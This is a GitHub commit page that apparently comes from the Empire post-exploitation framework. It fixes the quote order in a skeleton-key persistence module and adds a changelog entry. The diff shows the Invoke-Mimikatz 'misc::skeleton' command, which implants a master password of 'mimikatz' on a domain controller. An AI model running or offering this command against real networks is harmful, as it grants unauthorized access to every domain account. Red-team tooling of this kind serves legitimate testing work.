Skip to content

Commit c1c4a54

Browse files
committed
Fix misc_skeleton_key Invoke-Mimikatz single and double quote order
1 parent b8fb1c9 commit c1c4a54

File tree

2 files changed

+2
-1
lines changed

2 files changed

+2
-1
lines changed

CHANGELOG.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -21,6 +21,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
2121
### Fixed
2222

2323
- Fixed stop-job handlers in PowerShell and Python agents crashing when the target job doesn't exist
24+
- Fixed misc_skeleton_key Invoke-Mimikatz call
2425

2526
## [6.4.1] - 2026-02-15
2627
- Fixed the `docs/quickstart/installation/README.md` file to specify a previously missing reference to Ubuntu

empire/server/modules/powershell/persistence/misc/skeleton_key.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -40,5 +40,5 @@ options:
4040
required: true
4141
value: ''
4242
script_path: credentials/Invoke-Mimikatz.ps1
43-
script_end: Invoke-Mimikatz -Command "'misc::skeleton'"; 'Skeleton key implanted.
43+
script_end: Invoke-Mimikatz -Command '"misc::skeleton"'; 'Skeleton key implanted.
4444
Use password mimikatz for access.'

0 commit comments

Comments
 (0)